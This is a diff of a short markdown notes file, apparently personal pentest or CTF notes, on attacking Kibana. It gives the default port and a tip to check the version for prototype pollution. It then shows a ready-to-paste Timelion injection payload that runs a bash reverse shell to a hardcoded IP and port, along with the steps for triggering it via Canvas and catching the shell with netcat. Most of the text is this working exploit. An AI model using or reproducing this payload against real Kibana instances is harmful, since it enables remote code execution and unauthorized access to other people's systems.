sunst0rm/Good_to_know/goodtoknow.md

 *
 Kibana runs usually on port `5601`

-It is always good to check it's version and if it is vulnerable to `protype pollution`.
+It is always good to check it's version (Management section) and if it is vulnerable to `protype pollution`.

-TL;DR We run netcat and inject a payload in Timelion:
+TL;DR We run netcat and inject a payload in Timelion, run it and open Canvas to get shell in netcat's terminal.

 ```
 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/10.6.46.150/4444 0>&1\'");//')